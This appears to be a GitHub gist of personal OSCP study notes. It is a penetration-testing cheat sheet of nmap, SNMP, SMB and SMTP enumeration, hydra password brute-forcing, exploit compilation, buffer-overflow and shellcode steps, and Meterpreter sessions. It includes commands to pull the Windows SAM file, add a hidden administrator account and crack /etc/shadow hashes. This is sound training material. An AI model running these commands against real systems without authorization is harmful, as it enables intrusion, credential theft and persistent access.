http://download.vulnhub.com/pentesterlab/php_include_and_post_exploitation.pdf (PHP Include and Post Exploitation)
Best Book I refer:
http://www.amazon.com/Penetration-Testing-Hands-On-Introduction-Hacking/dp/1593275641
Raw
OSCP notes B'
Scan network for live hosts
(nmap/zenmap)
For NMAP –
nmap -vv -sP 192.168.0.1-254 -oG hosts_up.txt
cat hosts_up.txt | grep -i “up”
nmap -PN 192.168.9.200-254
(this will also show open ports for each host)
Identify OS
(nmap/zenmap)
For NMAP –
nmap -O 192.168.0.100 (just OS fingerprint)
nmap -A 192.168.9.201 (runs an “aggressive” scan – scan,OS fingerprint, version scan, scripts and traeroute)
Check hosts for services
(nmap/zenmap)
For NMAP
- nmap -sS 192.168.9.254 (TCP)
- nmap -sU 192.168.9.254 (UDP)
(Could be better to do this in zenmap and group servers by services)
FOR SNMP
- snmpwalk -c public -v1 192.168.9.254 1 |grep hrSWRunName|cut -d” ” -f
For a known port
- nmap – p 139 192.168.9.254
DNS Lookups/Hostnames
host -l <domain> <dns server>
e.g. host -l acme.local 192.168.0.220
Banner grab/Version services
(nmap/zenmap/SNMP)
Check versions of software/services against milw0rm and security focus)
For NMAP
- nmap -sV 192.168.9.254
For SNMP
snmpenum -t 192.168.0.100 (displays all snmp informations for that server)
For SMTP
nc -v <mailserver> 25
- Will give mailserver version. Can also VRFY to find valid usernames/email accounts
Netbios/SMB
- smb4k (graphical interface – lists shares)
- smbserverscan
- metasploit auxiliary scanner
./msfconsole
show
use scanner/smb/version
set RHOSTS 192.168.0.1-192.168.0.254
run
Enumerate Usernames
(SNMP/SMTP/SMB[NETBIOS]/Add others here)
For SMB
- nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep open sessions)
(on my machine /root/offsec) ./samrdump.py 192.168.9.201 (results from above)
For SNMP
- nmap -sT -p 161 192.168.9.200/254 -oG snmp_results.txt (then grep)
- snmpwalk public -v1 192.168.9.201 1 |grep 77.1.2.25 |cut -d” “ -f4
For SMTP – (/pentest/enumeration/vrfy)
- ./smtp_VRFY.py <mailserver IP>
** NEED TO MAKE THREADED – VERY SLOW **
SAMRDUMP.PY – (/pentest/python/impacket-examples/samrdump.py)
- ./samrdump.py SNMP server
*** NAMES.TXT – /pentest/enumeration/vrfy/names.txt ***
*** OR /pentest/web/wfuzz/wordlists/others/names.txt ***
Crack Passwords
(hydra/THC bruter)
(need mil-dict.txt from Milw0rm – cracked hashs)
FTP – hydra -l <username> -P mil-dic.txt -f <FTP SERVER> ftp -V
POP3 – hydra -l <username> -P mil-dict.txt -f <MAIL SERVER> pop3 -V (may need to use -t 15 to limit concurrent connections)
SNMP – hydra -P mil-dict.txt -f <SNMP SERVER> -V
MS VPN – dos2unix words (whatever word list)
cat words | thc-pptp-bruter VPN server
Look for known vulnerable services
(refer nmap/zenmap output)
Check versions of software (by either snmp enumeration or nmap/zenmap) against http://www.milw0rm.com/search.php or http://www.securityfocus.com/vulnerabilities or http://www.exploit-db.com
Compile exploit code if possible
(milw0rm archive)
cd /pentest/exploits/milw0rm
cat sploitlist.txt | grep -i [exploit]
Some exploits may be written for compilation under Windows, while others for Linux.
You can identify the environment by inspecting the headers.
cat exploit | grep “#include”
Windows: process.h, string.h, winbase.h, windows.h, winsock2.h
Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
Grep out Windows headers, to leave only Linux based exploits:
cat sploitlist.txt | grep -i exploit | cut -d ” ” -f1 | xargs grep sys | cut -d “:” -f1 | sort -u
LINUX
gcc -o dcom 66.c
./dcom
WINDOWS
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe ability.c -lwsock32
wine ability.exe (to run compiled file)
Wireshark Filters
To filter out all traffic for IP 192.168.0.100
!(IP.ADDR == 192.168.0.100)
FUZZING STEPS – ASH STYLE
Determine target application and operating system
Obtain a copy of the application
Analyse the RFC & communication protocols
Discover & record crash conditions
Analyse crash conditions for exploitation opportunities
Things we need to know
Which 4 bytes overwrite EIP
Do we have enough space in buffer for shellcode
Is this shellcode easily accessible in memory
Does the application filter out any characters
Will we encounter overflow protection mechanisms
(*** HANDY – framework3/tools -> nasm_shell.rb => JMP ESP ***)
Creating pattern for EIP location
- framework3/tools -> pattern_create.rb <length> >> Fuzzing_script (will append to the end of the script)
– then look in ollydbg for pattern (need to reverse it and convert)
- pattern_offset.rb <EIP PATTERN>
– will show byte offset
Creating shellcode
(in framework3)
./msfpayload |grep -i shell
./msfpayload …… o (for options)
./msfpayload …… c (to create)
** TAKE NOTE OF SHELLCODE SIZE AND ADJUST FINAL BUFFER TO SUIT **
CAN ALSO USE FRAMEWORK2 MSFWEB INTERFACE (super easy)
Finding an exploit
/pentest/exploits/milw0rm
grep <exploit> sploitlist.txt
MSFCLI (p243)
./msfcli
-o options
-p payloads
-t test
-e exploit
MSFCONSOLE
sessions -l => list created sessions
sessions -i # => interact with specific session number
show options
search <string>
use exploit/ …..
set PAYLOAD ….
exploit
Meterpreter Payloads (p260)
payload = windows/meterpreter/reverse_tcp ….
meterpreter> help (lists all commands)
upload <file> c:\\windows
download c:\\windows\\repair\\sam /tmp
ps (running tasks)
execute -f cmd -c (creates a new channel with the cmd shell)
interact # (interacts with channel)
Other useful windows commands
net user ash my_password /add
net localgroup administrators ash /add
Passwords & Hashes
Windows SAM => %systemroot%\Repair
(pwdump or fgdump – p340)
or use framework meterpreter shell => gethashes
Linux => /etc/passwd & /etc/shadow
John The Ripper
for linux => unshadow passwd & shadow file to another file
./john hashes.txt
Associated Documents
Common Ports – packetlife.net/media/library/23/common-ports.pdf
Wireshark – http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
TCPDUMP – http://packetlife.net/media/library/12/tcpdump.pdf
SANS NETCAT – http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
SANS MISC TOOLS – http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment